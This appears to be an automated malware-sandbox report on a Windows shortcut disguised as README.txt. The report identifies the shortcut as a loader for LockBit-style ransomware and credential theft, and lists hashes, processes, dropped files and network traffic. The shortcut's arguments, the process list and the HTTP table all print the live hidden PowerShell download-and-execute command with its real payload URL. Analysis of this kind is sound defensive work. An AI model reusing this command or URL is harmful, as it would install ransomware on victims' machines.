| File name: | README.txt.lnk |
| Full analysis: | https://app.any.run/tasks/e3c4d801-2dca-4607-a899-c1fb636b683a |
| Verdict: | Malicious activity |
| Threats: | A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. |
| Analysis date: | January 26, 2025, 14:51:15 |
| OS: | Windows 10 Professional (build: 19045, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-ms-shortcut |
| File info: | MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=70, Unicoded, MachineID desktop-aobmajb, EnableTargetMetadata KnownFolderID 1AC14E77-02E7-4E5D-B744-2EB1AE5198B7, Archive, ctime=Thu Apr 25 12:44:42 2024, atime=Sun Jan 19 10:39:00 2025, mtime=Thu Apr 25 12:44:42 2024, length=289792, window=showminnoactive, IDListSize 0x0135, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\", LocalBasePath "C:\Windows\System32\cmd.exe" |
| MD5: | E1CFF745A65A199BDF9DFEBE3F69E3F7 |
| SHA1: | 8C77E01CEB0FF774A66AFA5B7A32B0735E422E9E |
| SHA256: | 3B497EC4D80770A5172A72F871528397FDE8EA5969AA2C3CDE98EDB0A6946355 |
| SSDEEP: | 24:8Ff4GAjvZsxxkp4ISCAVPx+/B1reTkX12uQnlQr4I0n7WyDMn2PNgpkEQKeA/gAH:8Ffwj1dWs1qTUIumzImWyDkQBh+n |
MALICIOUS
Script downloads file (POWERSHELL)
- powershell.exe (PID: 5236)
Known privilege escalation attack
- dllhost.exe (PID: 5576)
RANSOMWARE has been detected
- 91qsdf.exe (PID: 4528)
Actions looks like stealing of personal data
- 91qsdf.exe (PID: 4528)
[YARA] LockBit is detected
- 91qsdf.exe (PID: 4528)
Renames files like ransomware
- 91qsdf.exe (PID: 4528)
Steals credentials from Web Browsers
- 91qsdf.exe (PID: 4528)
SUSPICIOUS
Possibly malicious use of IEX has been detected
- cmd.exe (PID: 5128)
The process bypasses the loading of PowerShell profile settings
- cmd.exe (PID: 5128)
Starts POWERSHELL.EXE for commands execution
- cmd.exe (PID: 5128)
Executes script without checking the security policy
- powershell.exe (PID: 5236)
Executable content was dropped or overwritten
- powershell.exe (PID: 5236)
There is functionality for taking screenshot (YARA)
- 91qsdf.exe (PID: 4528)
Write to the desktop.ini file (may be used to cloak folders)
- 91qsdf.exe (PID: 4528)
Reads security settings of Internet Explorer
- ShellExperienceHost.exe (PID: 3780)
INFO
Disables trace logs
- powershell.exe (PID: 5236)
Checks proxy server information
- powershell.exe (PID: 5236)
- SearchApp.exe (PID: 4388)
The executable file from the user directory is run by the Powershell process
- 91qsdf.exe (PID: 4244)
Checks supported languages
- 91qsdf.exe (PID: 4244)
- 91qsdf.exe (PID: 4528)
- SearchApp.exe (PID: 4388)
- ShellExperienceHost.exe (PID: 3780)
Reads the computer name
- 91qsdf.exe (PID: 4244)
- SearchApp.exe (PID: 4388)
- 91qsdf.exe (PID: 4528)
- ShellExperienceHost.exe (PID: 3780)
Reads the machine GUID from the registry
- 91qsdf.exe (PID: 4244)
- SearchApp.exe (PID: 4388)
Reads security settings of Internet Explorer
- dllhost.exe (PID: 5576)
Create files in a temporary directory
- 91qsdf.exe (PID: 4528)
Process checks computer location settings
- SearchApp.exe (PID: 4388)
Creates files or folders in the user directory
- 91qsdf.exe (PID: 4528)
Reads the software policy settings
- SearchApp.exe (PID: 4388)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
TRiD
| .lnk | | | Windows Shortcut (100) |
|---|
EXIF
LNK
| Flags: | IDList, LinkInfo, RelativePath, WorkingDir, CommandArgs, IconFile, Unicode, TargetMetadata |
|---|---|
| FileAttributes: | Archive |
| CreateDate: | 2024:04:25 12:44:42+00:00 |
| AccessDate: | 2025:01:19 10:39:00+00:00 |
| ModifyDate: | 2024:04:25 12:44:42+00:00 |
| TargetFileSize: | 289792 |
| IconIndex: | 70 |
| RunWindow: | Show Minimized No Activate |
| HotKey: | (none) |
| TargetFileDOSName: | cmd.exe |
| DriveType: | Fixed Disk |
| DriveSerialNumber: | 6EAC-DE50 |
| VolumeLabel: | - |
| LocalBasePath: | C:\Windows\System32\cmd.exe |
| RelativePath: | ..\..\..\Windows\System32\cmd.exe |
| WorkingDirectory: | C: |
| CommandLineArguments: | /c start notepad.exe & powershell.exe -w h -nop -c "iex(irm 'https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/rev.b64')" |
| IconFileName: | %SystemRoot%\System32\SHELL32.dll |
| FillAttributes: | 0x07 |
| PopupFillAttributes: | 0xf5 |
| ScreenBufferSize: | 120 x 9001 |
| WindowSize: | 120 x 30 |
| WindowOrigin: | 0 x 0 |
| FontSize: | 8 x 16 |
| FontFamily: | Unknown (0x36) |
| FontWeight: | 400 |
| FontName: | Consolas |
| CursorSize: | 25 |
| FullScreen: | No |
| QuickEdit: | Yes |
| InsertMode: | Yes |
| WindowOriginAuto: | Yes |
| HistoryBufferSize: | 50 |
| NumHistoryBuffers: | 4 |
| RemoveHistoryDuplicates: | No |
| MachineID: | desktop-aobmajb |
Total processes
133
Monitored processes
9
Malicious processes
3
Suspicious processes
1
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 3780 | "C:\WINDOWS\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca | C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Shell Experience Host Version: 10.0.19041.3758 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4244 | "C:\Users\admin\91qsdf.exe" | C:\Users\admin\91qsdf.exe | — | powershell.exe | |||||||||||
User: admin Integrity Level: MEDIUM Exit code: 0 Modules
| |||||||||||||||
| 4388 | "C:\WINDOWS\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca | C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Search application Version: 10.0.19041.3996 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4512 | notepad.exe | C:\Windows\System32\notepad.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 4528 | "C:\Users\admin\91qsdf.exe" | C:\Users\admin\91qsdf.exe | dllhost.exe | ||||||||||||
User: admin Integrity Level: HIGH Modules
| |||||||||||||||
| 5128 | "C:\Windows\System32\cmd.exe" /c start notepad.exe & powershell.exe -w h -nop -c "iex(irm 'https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/rev.b64')" | C:\Windows\System32\cmd.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5236 | powershell.exe -w h -nop -c "iex(irm 'https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/rev.b64')" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5576 | C:\WINDOWS\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | C:\Windows\SysWOW64\dllhost.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: COM Surrogate Exit code: 0 Version: 10.0.19041.3636 (WinBuild.160101.0800) Modules
| |||||||||||||||
| 5836 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Console Window Host Exit code: 0 Version: 10.0.19041.1 (WinBuild.160101.0800) Modules
| |||||||||||||||
Total events
12 912
Read events
12 862
Write events
49
Delete events
1
Modification events
| (PID) Process: | (3780) ShellExperienceHost.exe | Key: | \REGISTRY\A\{8bfcc4d3-e0ce-3101-edea-89a9df187ddf}\LocalState |
| Operation: | write | Name: | PeekBadges |
Value: 5B005D000000C05574CB0170DB01 | |||
| (PID) Process: | (4388) SearchApp.exe | Key: | \REGISTRY\A\{624917d5-ae9f-f63d-fd6b-09f88bf1a8dd}\LocalState |
| Operation: | write | Name: | BINGIDENTITY_PROP_USEREMAIL |
Value: 00002DAEB7000270DB01 | |||
| (PID) Process: | (4388) SearchApp.exe | Key: | \REGISTRY\A\{624917d5-ae9f-f63d-fd6b-09f88bf1a8dd}\LocalState |
| Operation: | write | Name: | BINGIDENTITY_PROP_ACCOUNTTYPETEXT |
Value: 00002DAEB7000270DB01 | |||
| (PID) Process: | (4388) SearchApp.exe | Key: | \REGISTRY\A\{624917d5-ae9f-f63d-fd6b-09f88bf1a8dd}\LocalState |
| Operation: | write | Name: | BINGIDENTITY_PROP_ACCOUNTTYPE |
Value: 00002DAEB7000270DB01 | |||
| (PID) Process: | (4388) SearchApp.exe | Key: | \REGISTRY\A\{624917d5-ae9f-f63d-fd6b-09f88bf1a8dd}\LocalState |
| Operation: | write | Name: | BINGIDENTITY_PROP_ACCOUNTTYPE |
Value: 4E006F006E00650000002DAEB7000270DB01 | |||
| (PID) Process: | (4388) SearchApp.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content |
| Operation: | write | Name: | CachePrefix |
Value: | |||
| (PID) Process: | (4388) SearchApp.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies |
| Operation: | write | Name: | CachePrefix |
Value: Cookie: | |||
| (PID) Process: | (4388) SearchApp.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History |
| Operation: | write | Name: | CachePrefix |
Value: Visited: | |||
| (PID) Process: | (4388) SearchApp.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\SearchSettings |
| Operation: | write | Name: | SafeSearchMode |
Value: 1 | |||
| (PID) Process: | (4388) SearchApp.exe | Key: | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\Flighting |
| Operation: | write | Name: | CachedFeatureString |
Value: | |||
Executable files
13
Suspicious files
1 899
Text files
2 085
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 4528 | 91qsdf.exe | C:\$Recycle.Bin\S-1-5-18\desktop.ini | binary | |
MD5:5B04D2CFB85733AB822E32654E9DD698 | SHA256:9305DEE203D9A27E55774292BE8809376B1E3EBAAC0EE9996A4E669D89AE5556 | |||
| 5236 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wwzynsa2.gr5.psm1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 5236 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_ztghkiug.y5v.ps1 | text | |
MD5:D17FE0A3F47BE24A6453E9EF58C94641 | SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7 | |||
| 4528 | 91qsdf.exe | C:\$Recycle.Bin\S-1-5-18\AAAAAAAAAAA | binary | |
MD5:5B04D2CFB85733AB822E32654E9DD698 | SHA256:9305DEE203D9A27E55774292BE8809376B1E3EBAAC0EE9996A4E669D89AE5556 | |||
| 5236 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:45EAB652181D3C05A5C41BDA393E896C | SHA256:A3B45E64F1DAB8BDCD6A9D6707A058D7B74ED461FDD823703C06A545844B16B8 | |||
| 4528 | 91qsdf.exe | C:\$Recycle.Bin\S-1-5-18\IIIIIIIIIII | binary | |
MD5:5B04D2CFB85733AB822E32654E9DD698 | SHA256:9305DEE203D9A27E55774292BE8809376B1E3EBAAC0EE9996A4E669D89AE5556 | |||
| 4528 | 91qsdf.exe | C:\$Recycle.Bin\S-1-5-18\BBBBBBBBBBB | binary | |
MD5:5B04D2CFB85733AB822E32654E9DD698 | SHA256:9305DEE203D9A27E55774292BE8809376B1E3EBAAC0EE9996A4E669D89AE5556 | |||
| 5236 | powershell.exe | C:\Users\admin\91qsdf.exe | executable | |
MD5:5E0B0AF4C133567F05FE4EFD9B6936E5 | SHA256:BD66FB04D8359196CB918F81F48A662830928DFD3218DFE0CC2418E21615F5A5 | |||
| 4528 | 91qsdf.exe | C:\$Recycle.Bin\S-1-5-18\EEEEEEEEEEE | binary | |
MD5:5B04D2CFB85733AB822E32654E9DD698 | SHA256:9305DEE203D9A27E55774292BE8809376B1E3EBAAC0EE9996A4E669D89AE5556 | |||
| 4528 | 91qsdf.exe | C:\$Recycle.Bin\S-1-5-18\DDDDDDDDDDD | binary | |
MD5:5B04D2CFB85733AB822E32654E9DD698 | SHA256:9305DEE203D9A27E55774292BE8809376B1E3EBAAC0EE9996A4E669D89AE5556 | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
21
TCP/UDP connections
23
DNS requests
8
Threats
1
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.16.164.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
3884 | svchost.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
3884 | svchost.exe | GET | 200 | 2.16.164.120:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
— | — | POST | 204 | 2.23.227.208:443 | https://www.bing.com/threshold/xls.aspx | unknown | — | — | whitelisted |
— | — | GET | 200 | 140.82.121.3:443 | https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/rev.b64 | unknown | text | 277 b | — |
— | — | GET | 200 | 140.82.121.3:443 | https://raw.githubusercontent.com/BalletsPistol/d9fb74g8db7d8b7db48df7g8db77f4drb7er8db7fd84d7b1gdb47d8b7brt18bcy87gdfb8hfg74h87fh8bf18h7/main/Encryptor.exe | unknown | executable | 147 Kb | — |
— | — | GET | 200 | 2.23.227.208:443 | https://www.bing.com/manifest/threshold.appcache | unknown | text | 3.46 Kb | whitelisted |
— | — | POST | 204 | 2.23.227.215:443 | https://www.bing.com/threshold/xls.aspx | unknown | — | — | whitelisted |
— | — | GET | 200 | 2.23.227.215:443 | https://www.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=DyIrb3t-gQF4cnWyAbUBK6UBK7gB&or=w | unknown | binary | 21.3 Kb | whitelisted |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
— | — | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
4712 | MoUsoCoreWorker.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
3884 | svchost.exe | 40.127.240.158:443 | — | MICROSOFT-CORP-MSN-AS-BLOCK | IE | unknown |
5064 | SearchApp.exe | 2.21.65.154:443 | www.bing.com | Akamai International B.V. | NL | whitelisted |
4712 | MoUsoCoreWorker.exe | 2.16.164.120:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
3884 | svchost.exe | 2.16.164.120:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted |
4712 | MoUsoCoreWorker.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
3884 | svchost.exe | 95.101.149.131:80 | www.microsoft.com | Akamai International B.V. | NL | whitelisted |
5236 | powershell.exe | 185.199.111.133:443 | raw.githubusercontent.com | FASTLY | US | shared |
DNS requests
Domain | IP | Reputation |
|---|---|---|
google.com |
| whitelisted |
www.bing.com |
| whitelisted |
crl.microsoft.com |
| whitelisted |
www.microsoft.com |
| whitelisted |
raw.githubusercontent.com |
| shared |
settings-win.data.microsoft.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
Threats
PID | Process | Class | Message |
|---|---|---|---|
2192 | svchost.exe | Not Suspicious Traffic | INFO [ANY.RUN] Attempting to access raw user content on GitHub |